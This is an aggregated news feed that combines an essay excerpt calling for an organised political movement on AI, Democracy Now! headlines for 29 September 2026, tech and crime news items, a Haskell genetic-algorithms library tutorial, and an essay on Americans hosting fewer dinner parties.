The left’s lack of engagement here is a real loss. Even non-leftists recognize it. Joshua Achiam, then OpenAI’s chief futurist, declared : “The left has completely abdicated their role in this discussion. A decade from now, this will be understood on the left to have been a generational mistake; perhaps even more than merely generational.”

Dean Ball, who led the authorship of Trump’s AI action plan before becoming an executive at OpenAI, declared : “Joshua is right.”

You may be suspicious of political adversaries wishing you were more present in the arena, but they recognize that – on the technology’s current course – this is an all-hands-on-deck situation. Indeed, we all need to reckon with the industry’s race to replace us, but we especially need – and especially don’t have – the left. We need organizers. We need people who can’t help but think about power to teach the ones who never learned to. We need ambition. We need people who believe that better worlds are possible.

The popularity of stigmatizing individual AI usage has been a gift to the industry, fracturing would-be opponents and activating our identities as consumers. BP had to pay an ad agency to popularize the “carbon footprint” to shift the blame for climate change to individuals. When we think as consumers, the goal becomes minimizing our own complicity. We should instead think as citizens: how do we democratically govern this technology in the public interest?

Right now, AI is being governed by unelected, unaccountable tech billionaires, subject to intense pressures from shareholders and the Trump administration. To have any hope of changing this intolerable status quo, we’ll need to build a movement powerful enough to defeat the richest industry in history.

In March, when I finished writing Obsolete , the book this piece draws from, I predicted:

It won’t be easy, but the ingredients are there for a mass movement unlike any the world has ever seen. Everyone has a stake in how AI develops – a reality that will become increasingly indisputable as the technology eats ever more of the world.

Since then, the dangers have appeared faster than I expected, but public awareness has grown even faster – making me feel more optimistic than ever. The AI story was never going to have a happy ending without deep and sustained engagement from the world, not just the tiny handful of people racing to build our replacements.

The big question is whether we can channel this new wave of concern into effective advocacy. Personally, I think the most promising place to start is at Irreplaceable.org . (I serve on the non-profit board and am donating my share of the book’s royalties to Irreplaceable.) Founded by veterans of the climate movement, Irreplaceable aims to meet people where they are, organize their anger into political power, and build a coalition strong enough to win democratic control over AI. The non-profit is organizing a national walkout to Freeze AI on 20 October. Anyone can join one near them or host their own.

I have no illusions that a day of walkouts will solve our AI problems. But it will bring together people with shared concerns, and some of them will become the friendships that sustain successful movements. Most of all, we’ll need to keep our eye on the ball: the companies trying to render us obsolete, not the friends and neighbors using their products.

Headlines for September 29, 2026

Democracy Now!
www.democracynow.org
2026-09-29 08:00:00
U.S. and Iran Hold Indirect Talks on Deal to End Fighting, Lift Sanctions and Reopen Hormuz, Iran Denies Involvement in Alleged Plot to Bomb British Air Base Used by U.S. Bombers, Ukraine’s Academy of Sciences Struck as Russian Drones Kill 9, Wound Dozens, Trump Administration Slashes Biden-Er...
Original Article

Hi there,

Our team of independent journalists comes together everyday to deliver the news you need, but right now, less than 1% of people who count on Democracy Now! donate to support our work. If just 1% of our global audience made a donation of any amount today, it would cover our costs for an entire year. For the last time this month, a group of generous donors will TRIPLE all new monthly donations started today, which means your monthly gift of $15 is worth $45. Please donate today to ensure we remain your go-to source for the most important stories of the day.

Every dollar makes a difference

. Thank you so much!

Democracy Now!
Amy Goodman

Non-commercial news needs your support.

We rely on contributions from you, our viewers and listeners to do our work. If you visit us daily or weekly or even just once a month, now is a great time to make your monthly contribution.

Please do your part today.

Donate

Independent Global News

Donate

Headlines September 29, 2026

Watch Headlines

U.S. and Iran Hold Indirect Talks on Deal to End Fighting, Lift Sanctions and Reopen Hormuz

Sep 29, 2026

Iran’s foreign minister has held indirect talks with the U.S. on a diplomatic proposal to end seven months of fighting. On Monday, Foreign Minister Abbas Araghchi said he’d discussed a plan with Qatari mediators that would see a phased reopening of the Strait of Hormuz within seven days, in exchange for an end to all hostilities in Iran and Lebanon, the lifting of the U.S. naval blockade of Iran, the unfreezing of billions of dollars’ worth of Iranian assets and an end to sanctions on Iranian oil.

The indirect talks came as Iran defended its strikes on U.S. bases across the Mideast as self-defense, warning neighboring countries would come under further attack if they continue to host U.S. forces. Iranian diplomat Nasser Assadi Nazari delivered the warning in an address to the U.N. General Assembly Monday.

Nasser Assadi Nazari : “The missiles that killed 168 children at the primary school in Minab and struck the Lamerd sports complex during the U.S.-Israel regime’s joint aggression against Iran were launched from neighboring territory. … These are only two of many such examples.”

Iran Denies Involvement in Alleged Plot to Bomb British Air Base Used by U.S. Bombers

Sep 29, 2026

In the U.K., the five men who were arrested on suspicion of terrorism after they allegedly approached the RAF Fairford military base carrying explosives have been released on bail. All five are British nationals. The U.K. has allowed U.S. warplanes to launch long-range strikes on Iran from RAF Fairford since March 1, fueling speculation that Iran was behind a plot to attack the base. This is Tristan Wilkinson, the councillor for the Cotswold district.

Tristan Wilkinson : “So, there was a specific threat about six weeks ago from the Iranians on this base. At the time, there was an increased surveillance around the area. This is an operational base. It’s no secret that, you know, we have American bombers here that are taking part in what’s happening in the Middle East at the moment. So, there’s always the risk.”

U.S. Secretary of State Marco Rubio says the incident at RAF Fairford “clearly involves the hands of a foreign actor.” Iran’s Embassy in London responded that it “categorically rejects and strongly condemns the recent unfounded and malicious speculations.”

Ukraine’s Academy of Sciences Struck as Russian Drones Kill 9, Wound Dozens

Sep 29, 2026

In Ukraine, a wave of Russian drone and missile strikes has killed nine people and left 80 others wounded. Among Russia’s targets was Ukraine’s Academy of Sciences in Kyiv, where two people were killed by a Russian drone that struck during the workday Monday. Survivors said the attack came without a sound and without warning.

Svitlana Solianyk : “I don’t understand this senseless war. I don’t understand any of what’s going on. I don’t know how to resolve this issue. But what’s happening is not right, and it’s ordinary people who are suffering.”

President Volodymyr Zelensky said 80 of the 120 drones fired at Ukraine were a newer, jet-powered model, making them harder to shoot down.

Elsewhere, officials in eastern Poland scrambled fighter jets and ordered residents to shelter in place after a Russian drone crashed near the Polish-Ukrainian border Monday.

Meanwhile, Ukraine claimed long-range attacks on two Russian factories and an oil facility far from the frontlines.

Trump Administration Slashes Biden-Era Fuel Economy Standards

Sep 29, 2026

The Trump administration issued new fuel economy rules on Monday that loosen the limits automakers must meet on pollution from gas-powered cars and light trucks. Rules set under the Biden administration called for vehicles to average about 50 miles per gallon by 2031. The Trump rules cut the target to just under 35 miles per gallon. Dave Cooke, the senior vehicles analyst for the Union of Concerned Scientists’ Clean Transportation Program, said, “The federal government’s decision to gut fuel economy standards is a handout to automakers and oil companies that will strap American consumers already struggling with an affordability crisis.”

Texas State Election Officials Send Delayed Voter Registration Applications After Error

Sep 29, 2026

In Texas, state election officials have sent tens of thousands of delayed voter registration applications to county election officials after discovering an error. Some of the applications had languished for over a year. The backlog sparked a scramble by counties to process the applications with just weeks left before November’s midterm elections.

In more news from Texas, a Black woman who was sentenced to five years in prison for casting a provisional ballot in the 2016 presidential election has overturned her conviction on appeal, capping a nearly decadelong legal battle. The 5-4 decision by Texas’s highest criminal court ends the case against Crystal Mason, whose provisional ballot wasn’t even counted since she was disqualified from voting at the time due to a past felony conviction for tax fraud. Click here to see our coverage of Crystal Mason’s case .

Top FBI Official Steps Down After a Year on the Job

Sep 29, 2026

A top FBI official said Monday he’s stepping down about a year after he was nominated by President Trump and confirmed by the Senate. Andrew Bailey served as co-deputy director of the FBI in an unusual arrangement with right-wing podcaster Dan Bongino, before Bongino left the FBI in January after clashing with former Attorney General Pam Bondi over the Justice Department’s handling of the Epstein files. Bailey had been tasked with overseeing some of the investigations into President Trump’s debunked claims that the 2020 election was rigged.

Meanwhile, the FBI has confirmed that hackers accessed a trove of personal data on potentially tens of thousands of current and former FBI employees, including their names, addresses, phone numbers, and details on their spouses.

OpenAI Scraps Release of Latest AI Model Due to Safety Concerns

Sep 29, 2026

OpenAI is scrapping the release of its latest AI model, known as GPT -6.1 Astra, over safety concerns. This comes after OpenAI agents interfered with websites run by the U.S. Education Department, the Commerce Department and the SEC , without the company’s knowledge. In an interview, the OpenAI head of safety said the latest model had scored poorly on its ability to align with humans and showed higher levels of deception.

Meanwhile, Reuters reports Anthropic’s prospectus for an initial public offering details how the company lost $42 billion in 2025, while warning investors that advanced AI could pose “catastrophic or existential risks to humanity.”

This comes as chipmaker Nvidia announced the largest-ever stock buyback increase in U.S. corporate history, valued at $150 billion. Nvidia’s CEO Jensen Huang has gone on record saying that he rejects warnings that AI could make humans extinct. Nvidia is among the companies profiting most from the rapid buildout of AI data centers, which has drawn protests across the country.

Trump Administration Reverses Biden-Era LGBTQ School Protections

Sep 29, 2026

Image Credit: ACLU

The Trump administration announced Monday it had reversed a Biden-era policy that broadened the federal ban on sex discrimination in schools to cover LGBTQ people. Shiwali Patel of the National Women’s Law Center responded, “Sexual harassment and assault continue to be pervasive in schools and, to the fullest extent possible, we should be working to enforce the laws that protect student survivors of sexual violence. Yet Education Secretary Linda McMahon and the Trump administration have decided to ignore what survivors need, instead weaponizing Title IX to attack trans students.”

New York Prosecutor Reopens Cornell University Gang Rape Investigation

Sep 29, 2026

Image Credit: Axel Tschentscher

A New York prosecutor has reopened a sexual assault investigation at Cornell University after a woman alleged she’d been drugged, assaulted and gang raped by seven former and current members of the Chi Phi fraternity in 2024 when she was a 20-year-old undergraduate student. The allegations came in a lawsuit filed this month by a woman identified only as “Jane Doe,” who says campus officials and law enforcement failed to take her accusations seriously. On Monday, Tompkins County District Attorney Matthew Van Houten defended his initial decision not to seek charges, writing, “Seeking justice sometimes requires us to reconsider or reopen cases when we are provided with additional evidence.” A lawyer for the plaintiff says his client’s claims have not materially changed since she filed a police report in the weeks after the alleged assault.

On Sunday, New York Congresswoman Alexandria Ocasio-Cortez addressed the controversy at a “Students vs. Billionaires” event in Ithaca.

Rep. Alexandria Ocasio-Cortez : “I want to be clear that the culture of rape, sexual assault and pedophilia is protected in elite institutions across the United States, and including Cornell University in this instance. The fact that Jane Doe, that survivor, lost her education because you can’t stay in school when something like that happens to you. Rape is often used as an act of war. It is one of the most horrifying violations that can — that a human being can endure. It’s a form of torture. You can’t stay in school. The fact that she had to lose her education, and those men were protected by an institution and granted an Ivy League degree as a reward? Never again. Never Again.”

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Non-commercial news needs your support

We rely on contributions from our viewers and listeners to do our work.
Please do your part today.

Make a donation

US sanctions force The Netherlands off Microsoft and toward alternative NixOS

Hacker News
www.tomshardware.com
2026-09-29 07:44:25
Comments...
Original Article

When the U.S. government imposed sanctions on the International Criminal Court (ICC) in The Hague, Netherlands, it also meant that its chief prosecutor lost access to Microsoft services, including email. It was then that the Dutch government decided that it was time to make plans that would reduce its reliance on software and services that were made or based in the United States. The result of that decision was DAWO, or Digitaal Autonome Werkomgeving Overheid (Digital Autonomous Work Environment for Government in English). And work is underway to bring it to fruition.

As Tweakers reports, via It's FOSS , the program was aimed at refreshing the technologies used by the Dutch government in such a way that it would no longer be in a situation where it could lose access to critical systems at the whim of a foreign country. From operating systems to office software and cloud services, a new system had to be devised and rolled out.

Get Tom's Hardware's best news and in-depth reviews, straight to your inbox.

Vietnamese man charged in $16 million 'pig butchering' crypto scam

Bleeping Computer
www.bleepingcomputer.com
2026-09-29 07:41:53
A Vietnamese national was charged with money laundering for his role in a massive "pig butchering" scam, which defrauded a victim out of $16 million worth of cryptocurrency. [...]...
Original Article

Hacker Bitcoin money laundering

A Vietnamese national was charged with money laundering for his role in a massive "pig butchering" scam, which defrauded a victim out of $16 million worth of cryptocurrency.

37-year-old Trung Nguyen Van entered the United States through the San Ysidro, California / Mexico pedestrian border entry point on September 22 and was arrested before boarding a flight to Taiwan out of Los Angeles International Airport on September 24.

One of Van's victims transferred about $16 million in cryptocurrency between June and August 2024 in transfers directly traceable to Van's cryptocurrency wallet, believing they were investing in a crypto investment platform called "Triangle."

After collecting the funds, the defendant transferred them to a private, unhosted crypto wallet off the centralized blockchain network.

According to court documents , the charges stem from a broader wire fraud scheme involving more than $125,000,000 in cryptocurrency, with Van's crypto wallet receiving over $53 million between February 2018 and December 2024, including at least $24 million in crypto assets linked to known "pig butchering" schemes.

"From Feb. 9, 2018, through Dec. 17, 2024, Van's cryptocurrency wallets received approximately $53,275,939 in cryptocurrency assets from wire fraud schemes targeting United States citizens. The wallet transferred approximately $53,188,466 worth of the same cryptocurrency assets to other accounts off the centralized blockchain network," the Department of Justice said .

"Each of the victims were instructed to transfer cryptocurrency to different websites, but each victim reported a similar story. In each of these schemes, victims were guided by an individual they met online to invest cryptocurrency in a specified 'website' with a promise of high financial returns. Ultimately, each victim was never able to withdraw funds they invested and eventually discovered they had been defrauded."

In pig butchering scams (also known as cryptocurrency investment scams or romance baiting ), fraudsters reach out to targets via social media, dating sites, and messaging apps, build trust, and then lure victims into fake investment schemes. However, instead of investing the funds, scammers steal the money by moving it into crypto accounts under their control.

The U.S. Federal Bureau of Investigation (FBI) said in its 2025 Internet Crime Report that Americans lost almost $21 billion to cyber-enabled crimes last year, with investment scams accounting for 49% of all scam-related incidents and resulting in $8.6 billion in losses.

In February, a Chinese national was sentenced to 20 years in prison in absentia for his role in an international pig butchering scheme that defrauded victims of more than $73 million, months after U.S. federal authorities established a task force that aims to disrupt Chinese cryptocurrency scam networks known as the Scam Center Strike Force team.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

Prototyping a Small Genetic Algorithms Library inHaskell (2019)

Lobsters
anekstein.com
2026-09-29 07:36:16
Comments...
Original Article

This post assumes a basic understanding of genetic algorithms and the terminology associated with them, as well as a cursory understanding of recursion schemes; resources for both may be found scattered within the post. All source code can be found here .

First blog post – yay! This post documents some of my experience getting practice with recursion schemes and some monadic computations in the context of prototyping a genetic algorithms library. For a full-fledged, flexible, genetic algorithms library written in Haskell, I refer the reader to moo .

Getting a birds-eye view

Genetic algorithms are a type of heuristic in which candidate solutions to a problem are stochastically and incrementally evolved over time with the aim of producing performant ones; candidates, or individuals, are evolved with the help of genetic operators for selecting, manufacturing, and altering those individuals.

Contextualizing the computations

Let’s start by defining some of the context in which our genetic algorithm should run. It would be nice to reference a configuration containing all the definitions and parameters we could need (like mutation and selection methods), utilize and update a random number generator for generating and mutating individuals, and log intermediate data. The RWS monad presents itself as a candidate for meeting these criteria, so let’s wrap it in a newtype:

newtype GAContext indv a = GAContext {
    ctx :: RWS (GAConfig indv) [T.Text] PureMT a
} deriving (
        Functor, 
        Applicative, 
        Monad, 
        MonadReader (GAConfig indv), 
        MonadWriter [T.Text],
        MonadState PureMT
    )

With this definition (which requires GeneralizedNewtypeDeriving ), we can reference and update the PureMT random number generator with get and put , refer to our configuration with ask , and log intermediate data with tell .

One of my favorite genetic algorithm libraries, deap , allows you to keep track of a hall of fame – a collection of the most-fit individuals. We can represent this collection as a continually-updated min-heap, where the worst-performing individuals at a particular point in time can be popped from the heap and discarded:

import qualified Data.Heap as Heap
type HOF a = Heap.MinHeap a

It would be helpful to have a means of tracking the best individuals over time, along with any other data that could be gathered with every new generation. For this, a snapshot data type:

data GASnapshot a = Snapshot {
    -- the collection of individuals from the last generation
    lastGeneration :: Vector a
    -- the collection of top performers, the Hall of Fame (HOF)
  , hof :: HOF a 
    -- the current generation id
  , generationNumber :: Int
} deriving (Show)

Configuring the genetic algorithm

Next we can define the data type containing all of our configuration parameters that we will then be able to reference in GAContext computations:

data GAConfig i = Config {
    -- the probability an individual is mutated
    mutationRateInd :: Double 
    -- the probability a gene of an individual is mutated
  , mutationRateGene :: Double 
    -- the percentage of the population that gets replaced through recombination
  , crossoverRate :: Double 
    -- the population size
  , popSize :: Int 
    -- the mutation method
  , mutate :: i -> GAContext i i 
    -- the crossover method
  , crossover :: i -> i -> GAContext i i 
    -- the method to create a new individual
  , randomIndividual :: GAContext i i  
    -- the selection method
  , selectionMethod :: Vector i -> GAContext i (Vector i) 
    -- the fitness function (higher fitness is preferred)
  , fitness :: i -> Double 
    -- the number of generations
  , numGenerations :: Int 
    -- the `hofSize` best individuals across all generations
  , hofSize :: Int 
    -- function for information sourced from most recent snapshot
  , logFunc :: GASnapshot i -> GAContext i () 
}

This configuration serves as the basic interface to the library. Once an instance of this data type is created, the genetic algorithm can do the bulk of its work.

Utilizing the genetic operators

The genetic algorithm will evolve our set of candidate solutions over time for a fixed number of steps, or generations.

Grabbing snapshots

Every generation of the genetic algorithm is determined by a step function:

step :: Ord a => GASnapshot a -> GAContext a (GASnapshot a)
step (Snapshot lastGen hof genNumber) = do
    Config {hofSize, logFunc, popSize, selectionMethod} <- ask 
    -- select parents and create the next generation from them
    selectedParents <- selectionMethod lastGen
    -- use the set of parents to create and mutate a new generation
    children <- crossAndMutate selectedParents popSize
    -- update the HOF
    updatedHOF <- updateHOF hof children hofSize
    -- construct the new snapshot
    let nextSnapshot = Snapshot{
        lastGeneration = children,
        hof = updatedHOF,
        generationNumber = genNumber + 1
    }
    -- log intermediate results
    logFunc nextSnapshot
    -- return the mutated generation
    return nextSnapshot

The step function takes the current snapshot, along with the user-defined configuration to select a portion of the population to pass genetic material, crossover individuals from that subset to generate children, and mutate a portion of those children. With every pass, the Hall of Fame is updated with better-fit individuals, if they are found, and the subsequent snapshot is returned.

Crossover and Mutation

After parents are selected with the user-defined selectionMethod , the Vector of parents act as a seed from which children are produced. The generation of these children via crossover and their mutation are done in the same pass with a hylomorphism:

-- repeatedly selects two new parents from `parents` from
-- which `n` total children are produced
crossAndMutate :: (Vector a) -> Int -> GAContext a (Vector a)
crossAndMutate parents n = hyloM toVector (newChild parents) n

At this point, I refer the reader to the existing (and superior) resources on recursion schemes, if they are unfamiliar with the concept; I found Awesome Recursion Schemes to be helpful, particularly Patrick Thompson’s series and Jared Tobin’s blog posts .

Briefly, and skipping over useful generalizations provided by the recursion-schemes library: catamorphisms tear down structures, anamorphisms construct structures, and hylomorphisms are the composition of an anamorphism and a catamorphism, i.e. the construction and tearing-down of an intermediate structure. Catamorphisms utilize a function to tear down their structures while anamorphisms utilize a function to build up their structures. Both functions can be found within Control.Functor.Algebra and are representations of the morphisms that each comprise a third of an F-Algebra and F-CoAlgebra respectively:

type Algebra f a = f a -> a
type CoAlgebra f a = a -> f a

Normal hylomorphisms have the type:

hylo :: Functor f => (Algebra f b) -> (CoAlgebra f a) -> a -> b 

For our case, the monadic context of GAContext needs to be preserved. The haskell package data-fix offers the hyloM function, which instead relies on the monadic AlgebraM and CoAlgebraM types:

type AlgebraM m f a = f a -> m a
type CoAlgebraM m f a = a -> m (f a)

hyloM :: (Functor f, Monad m) => (AlgebraM m f b) ->
                                 (CoAlgebraM m f a) -> a -> m b 

With the monadic hylomorphism in crossAndMutate above, a fixed list of mutated children is unfolded from a seed using newChild and folded into a vector of the same type using toVector . This yields the next generation of candidate solutions for the genetic algorithm.

Let’s take a look at the newChild function:

-- selects two parents to breed, a child is born, joy to the world
newChild :: (Vector a) -> CoAlgebraM (GAContext a) (ListF a) Int
newChild parents 0 = return Nil
newChild parents m = do
    -- get mutation and crossover methods
    Config {crossover, mutate} <- ask
    -- get two random indices
    i <- randomI
    j <- randomI
    -- from the two indices, grab two parents
    let p1 = parents ! (i `mod` (length parents))
    let p2 = parents ! (j `mod` (length parents))
    -- make a child
    child <- crossover p1 p2
    -- mutate the child
    mutatedChild <- mutate child
    -- add the child to the collection
    return $ Cons mutatedChild (m-1)

newChild generates a new individual with the user-defined crossover function from two parents chosen at random from the group individuals selected to pass on their genetic material. We then apply the user-defined mutate function to the child and append that mutated individual to the in-progress collection of children. This is the anamorphic half of the hylomorphism.

The catamorphic half of the transformation is accomplished with toVector below:

-- converts Fix (ListF a) into Vector a
toVector :: AlgebraM (GAContext a) (ListF a) (Vector a)
toVector = return . embed

and we can see that it is rather straightfoward, once we make a Corecursive instance of Vector to leverage the embed function:

type instance Base (Vector a) = ListF a
instance Corecursive (Vector a) where
  embed (Cons x xs) = x `V.cons` xs
  embed Nil = V.empty

In addition to the above instance, we will find later on, with our use of cata that defining a Recursive instance of Vector is also necessary:

instance Recursive (Vector a) where
  project xs | V.null xs = Nil
             | otherwise = Cons (V.head xs) (V.tail xs)

Updating the Hall of Fame

Once the collection of mutated children has been returned by crossAndMutate , we will want to update the Hall of Fame with any individuals that perform better than the extant individuals therein. Let’s create a function that will take a vector of individuals and insert them all into the heap representing the Hall of Fame:

-- inserts elements from a list into a heap
insertHeap :: Ord a => HOF a -> (Vector a) -> HOF a
insertHeap hof = cata insert where
    insert Nil = hof
    insert (Cons a heap) = Heap.insert a heap

Simple enough. Our catamorphism breaks down our Vector into a HOF ; all it needs is the existing one into which we can insert the elements.

With this, we can update the current HOF by dumping the latest population into it and popping off minimally-fit individuals until the HOF is back at its original size.

-- updates the HOF by removing the worst-fit individuals from the min-heap
updateHOF :: Ord a => HOF a -> Vector a -> Int -> GAContext a (HOF a)
updateHOF hof pop hofSize = return . Heap.drop n $ oversizedHOF where
    -- insert all of the current population
    oversizedHOF = insertHeap hof pop
    -- drop all but hofSize individuals
    n = V.length pop - if Heap.isEmpty hof then hofSize else 0

Invoking the Genetic Algorithm

Now that we have outlined the flow of the genetic algorithm, we need to provide an initial population. For this, we leverage the user-defined randomIndividual function, provided within the ever-present GAConfig :

-- creates a vector of random individuals
makePopulation :: Int -> GAContext a (Vector a)
makePopulation s = hyloM toVector addRandomInd s where
    -- creates a random individual and adds it to the collection
    addRandomInd :: CoAlgebraM (GAContext a) (ListF a) Int
    addRandomInd 0 = return Nil
    addRandomInd n = do
        -- get a new, random individual
        ind <- randomIndividual =<< ask
        -- add it to the collection
        return $ Cons ind (n-1)

We now have all pieces necessary for running the genetic algorithm for one complete generation. After some initial setup, we can run for the user-specified number of generations:

runGA :: Ord a => GAContext a (GASnapshot a)
runGA = do
    Config {numGenerations, popSize, hofSize} <- ask
    -- initialize the population
    initialPop <- makePopulation popSize
    -- set up the initial Hall of Fame
    initialHOF <- updateHOF (Heap.empty :: HOF a) initialPop hofSize
    -- set up the initial snapshot
    let snapshot = Snapshot {
                lastGeneration = initialPop,
                hof = initialHOF,
                generationNumber = 0
              }
    -- run the genetic algorithm
    runN numGenerations step snapshot

Using our configuration parameters we create an initial snapshot and pass that to a function that runs the step function for a set number of iterations equal to the number of generations. Let’s take a look at the definition of runN :

-- a function reminiscent of iterateM that completes
-- after `n` evaluations, returning the `n`th result
runN :: Monad m => Int -> (a -> m a) -> a -> m a
runN 0 _ a = return a
runN n f a = do
    a' <- f a
    runN (n-1) f a'

it takes a function (in our case step ) and applies that function n times, returning the final result.

Finally, we can run the GAContext , a newtype wrapper for the RWS monad, with runRWS and evalRWS :

-- from a new rng, run the genetic algorithm
evalGA :: Ord i => GAConfig i -> IO (GASnapshot i, [T.Text])
evalGA cfg = newPureMT >>= (return . evalGASeed cfg)

-- from a user-supplied rng, run the genetic algorithm
evalGASeed :: Ord i => GAConfig i -> PureMT -> (GASnapshot i, [T.Text])
evalGASeed cfg rng = evalRWS (ctx runGA) cfg rng

-- from a user-supplied rng, run the genetic algorithm and return the updated seed
runGASeed :: Ord i => GAConfig i -> PureMT -> (GASnapshot i, PureMT, [T.Text])
runGASeed cfg rng = runRWS (ctx runGA) cfg rng

With this, all the user needs to do is define their genetic operators and fitness functions for their own individual representation, and they should be able to call one of these three functions to run the genetic algorithm.

Using the library

Let’s see an example of it in action with a very simple problem: maximizing the number of 1’s in a 500-bit binary string. Source can be found in BinaryInd.hs .

Representation

We’ll represent the binary string as a list of Bool :

data BinaryInd = BI [Bool] deriving (Show)
instance Eq BinaryInd where
    (BI b1) == (BI b2) = b1 == b2

Fitness function

We can start simply by defining the fitness function for this individual representation, which is just the number of True booleans in the list:

-- count the number of `True` bools in the chromosome
score :: BinaryInd -> Double
score (BI bs) = fromIntegral . length . filter id $ bs

instance Ord BinaryInd where
    b1 `compare` b2 = (score b1) `compare` (score b2)

Random individuals

Next we can define a function to create a new and random bit string of length 500:

-- create an individual, represented by a list, by
-- initializing its elements randomly
new :: GAContext BinaryInd BinaryInd
new = fmap BI $ replicateM 500 randomBool

Mutation

We’ll also need to provide a way to mutate our individual:

-- mutate a binary string representation
mutate :: BinaryInd -> GAContext BinaryInd BinaryInd
mutate ind@(BI bs) = do
        -- grab individual and gene mutation rates
        Config{mutationRateGene, mutationRateInd} <- ask
        -- get a random double
        indp <- randomD
        -- if the value is less than mutation rate for an individual
        if indp < mutationRateInd then
            -- mutate each bit with `mutationRateGene` probability
            fmap BI $ mapM (mutateBool mutationRateGene) bs
        else
            -- return the unaltered individual
            return ind

-- mutate a boolean by flipping it
mutateBool :: Double -> Bool -> GAContext a Bool
mutateBool p x = do
    -- get a random double
    indp <- randomD
    -- determine whether or not to flip the bit
    return $ if indp < p then not x else x

In mutate , we get a random double with a helper function randomD and decide whether the given individual is to be mutated at all. If it is to be mutated, iterate over the given individual and determine whether the genes themselves (the bits) should be mutated with some given probability with mutateBool .

Crossover

To cross two parents, we’ll generate a bitmask that will inform us whether a given gene should be taken from the first parent or the second parent:

-- recombine two individuals from the population
crossover :: BinaryInd -> BinaryInd -> GAContext BinaryInd BinaryInd
crossover (BI i1) (BI i2) = do
        -- get the crossover rate
        Config{crossoverRate} <- ask
        -- get a random double
        indp <- randomD
        if indp < crossoverRate then do -- perform crossover
            -- get booleans specifying which gene to take
            code <- replicateM (length i1) randomBool
            -- choose genetic material from first or second parent
            let eitherOr = (\takeThis this that -> if takeThis then this else that)
            -- perform uniform crossover
            return . BI $ zipWith3 eitherOr code i1 i2
        else do
            -- choose the genetic material from one of the parents
            chooseFirstParent <- randomBool
            return . BI $ if chooseFirstParent then i1 else i2

This type of crossover is called uniform crossover .

Selection

Our selection scheme is simple: take the best 20% of the population:

select :: Ord a => Vector a -> GAContext a (Vector a)
select pop = do
    -- get the population size
    Config{popSize} <- ask
    -- get the number of individuals to breed
    let numToSelect = round $ 0.2 * (fromIntegral popSize)
    -- get the top 20% of the best-performing individuals
    let selectedParents = V.take numToSelect . V.reverse $ V.modify sort pop
    return selectedParents

Optimizing our bit string

Almost there! It’s time to run the genetic algorithm in our main function by instantiating a GAConfig with the functions we’ve defined:

import qualified BinaryInd as BI

main :: IO ()
main = do

    let cfg = Config {
        mutationRateInd = 0.8
      , mutationRateGene = 0.02
      , crossoverRate = 0.7
      , popSize = 100
      , mutate = BI.mutate
      , crossover = BI.crossover
      , randomIndividual = BI.new
      , selectionMethod = BI.select
      , fitness = BI.score
      , numGenerations = 200
      , hofSize = 1
      , logFunc = logHOF
    }

    -- run the genetic algorithm
    (finalSnapshot, progress) <- evalGA cfg

    -- output the best fitnesses as they're found
    mapM_ (putStrLn . T.unpack) progress

We call the evalGA function on our configuration to yield the final snapshot containing the hof. We can log the progress of the genetic algorithm by printing the logging messages written with tell and logFunc .

The logHOF function puts the scores of the HOF into CSV format for easy graphing:

logHOF :: Ord a => GASnapshot a -> GAContext a ()
logHOF Snapshot{hof, generationNumber} = do
    -- get the fitness function
    Config {fitness} <- ask
    -- get string representations of the best individuals
    let best = map (T.pack . show . fitness) $ Heap.toList hof
    -- craft the comma-separated line
    let msg = [T.concat $ intersperse (T.pack ",") best]
    -- log the line
    tell msg

And here we can see how the GA improves fitness across generations:

We can see that the GA is does pretty well for our little problem, making it most of the way towards an optimal solution within the first 100 generations. Not bad!

Wrapping up

We’ve prototyped a library that can allow us to see if our given (and contrived) problem could stand to benefit from a genetic algorithm. I realize I’ve glossed over some details here, such as the randomD and randomBool definitions; if you want code that compiles, you’ll need to consult the source .

I also briefly mentioned the resources for recursion schemes, but if you’d like more examples (namely with cata , cataM , and anaM ) I’ve created a recursion-scheme-based analogue to BinaryInd in BinaryIndRec.hs .

You Are No Longer Invited to Dinner

Hacker News
www.derekthompson.org
2026-09-29 07:14:45
Comments...
Original Article

Mid-century Americans knew how to throw a party, for better or worse. In some of the most famous titles of the 1950s and 1960s— Couples , by John Updike; Who’s Afraid of Virginia Woolf? by Edward Albee; Revolutionary Road by Richard Yates—the drama (and martini-soaked melodrama) took place in middle-class living rooms.

The stories were fictional, but the setting was realistic. Until 1975, half of Americans said they entertained guests at their home every month.

But then something changed. Americans stopped throwing parties. Even more fundamentally, they stopped visiting each other. Between 1975 and 1998, the share of Americans who gave or attended a monthly dinner party declined by half. The share of Americans saying they never entertained people at home tripled. [ See charts below ] While cultural critics often bemoan the decline of organized religion, the dip in church attendance was downright modest compared to the collapse in hosting, according to data gathered by the DDB Needham Life Style survey.

In his 2000 book Bowling Alone , Robert Putnam wrote that if these trends continued, the ancient practice of visiting with friends “might entirely disappear from American life in less than a generation.” Well, check your calendars. One generation and change later, Putnam’s prediction needs an update.

So, what’s the state of hosting in the 21st century?

To get an apples-to-apples answer to that question, the polling group Data For Progress replicated the DDB Needham Life Style surveys cited by Putnam. Fortunately, they were kind enough to exclusively share their findings with me . Unfortunately, the upshot is about as brutal as you’d imagine.

In the last 30 years, Americans have seen double-digit declines in practically every measure of socializing. They are less likely to play cards; attend a sporting event; go to the bar; volunteer; or work on a community project.

When it comes to hosting people at home, the declines are particularly stark. Since 1995, the share of Americans who say they’ve hosted guests or attended a dinner party has declined by about 20 percent—and that’s in addition to the whopping declines that Putnam bemoaned a quarter-century ago.

Combining the two surveys, we get this astonishing fact: The share of Americans who say they host friends or family at their home at least monthly has fallen from 42 percent in 1975 to 12 percent in 2026—a 70 percent collapse in a half-century.

So, what’s going on? Let’s first reject a few stories that don’t entirely fit the data.

Perhaps, an optimist might think, Americans are hosting fewer dinner parties because they’ve simply moved all their hangouts to restaurants and bars. Nice idea, but almost certainly wrong. As Putnam writes in his book, “the practice of entertaining friends has not simply moved outside the home, but seems to be vanishing entirely.” Overall face-to-face socializing has declined significantly in the last few decades , and the restaurant industry has actually noted a sharp increase in people eating alone. See, for example, this story in the New York Times :

Another plausible theory is that Americans have replaced dinner parties with other forms of healthy socialization. It is absolutely true that there are some activities that Americans do much more often than in 1975, such as going to concerts, traveling, and exercising. All very good.

